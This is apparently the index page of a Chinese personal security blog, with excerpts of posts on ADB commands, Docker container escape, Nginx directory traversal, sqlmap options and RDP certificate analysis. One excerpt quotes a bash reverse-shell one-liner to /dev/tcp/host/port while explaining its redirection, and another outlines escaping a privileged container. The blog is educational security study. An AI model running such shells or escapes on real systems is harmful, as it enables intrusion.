在野的黄

在野的黄

最新文章

ADB调试常用指令

常用的ADB调试指令: 启动和停止ADB服务 adb start-server:启动ADB服务。 adb kill-server:停止ADB服务。 设备连接管理 adb devices:列出所有已连接的Android设备或模拟器。 adb connect <device-ip>:<port>:通过T

容器安全之Docker逃逸

一、危险配置 1. Privileged特权模式 利用条件:容器以特权模式运行 docker run --privileged 以特权模式运行的容器可以访问宿主机上的所有设备。 可以在容器中挂载宿主机的磁盘,然后将根目录切换过去。 2. SYS_ADMIN 利用条件: 以root身份运行容器。 使用

对反弹shell中0>&1的理解

今天在学习反弹shell,遇到一个经典的构造: /bin/bash -i &> /dev/tcp/host/port 0>&1 对语句最后的0>&1我百思不得其解,为什么标准输入重定向到标准输出,攻击端输入的指定就到本机来了呢?标准输入指的是本机键盘输入吗?键盘输入重定向到屏幕不应该就是默认的吗?这
2
0
2
2024-03-13

Wireshark分析RDP服务器专有证书

本文记录一次使用Wireshark分析RDP证书的过程,这次遇到的证书比较特殊,是服务器专有证书(Server Proprietary Certificate),不能直接使用X.509格式的方式查看,当时为了分析这个证书花了不少时间。 下面记录一下分析过程,不想看过程可以直接跳到第三章节看快速判断方

Docker容器识别

想研究的课题是容器的渗透,一大方向就是容器逃逸。那么逃逸前自然需要判断是否处在容器中。那么就需要了解容器有哪些特征。假设进入一台远程服务器,通过何种手段开源判断此环境是否在容器之中。 容器虚拟技术有很多,最主流的就是Docker,也比较方便搭建实验环境。所以就先研究Docker的容器特征。手边刚好有

Nginx目录穿越漏洞

漏洞介绍 Nginx在配置alias的时候,如果location最后不是以斜杠结尾,而alias以斜杠结尾,那么将出现目录穿越漏洞。 通过实验了解漏洞 实验靶场用的是《从0到1:CTFer成长之路》第一章第三节任意文件读取漏洞的第2个实验靶场。 靶场的配置文件docker-compose.yml内容
1
0
2
2024-02-27

宝塔PHP安装扩展memcached失败

使用宝塔自带的php扩展安装功能,安装memcached失败,截取报错信息最后一段:

博客维护,数据迁移中

GeneratePress主题快要过期了,虽然去年用这个主题做出了挺满意的效果,但无奈价格实在不便宜,所以今年不续费了。 由于选择困难症,自己开发主题的想法又迟迟没有进展,最后决定用官方提供的2024主题算了,然后自己在此基础上二次修改。也是个不错的想法,2024年就用2024主题,2025年就用2
1
0
2
2024-02-25

Windows文件给予完全控制权限无效

使用pip安装sqlmap遇到问题,报错信息:

sqlmap 的 level 和 risk 参数

level 参数 简单说,--level参数决定了sqlmap在检测SQL注入时的“努力程度”。 level 1:默认的level等级,会测试GET和POST请求中的参数。 level 2:除了前面提到的,还会检查cookie里的数据。 level 3:user-agent和referer头部也纳入
2
1
2
2024-01-27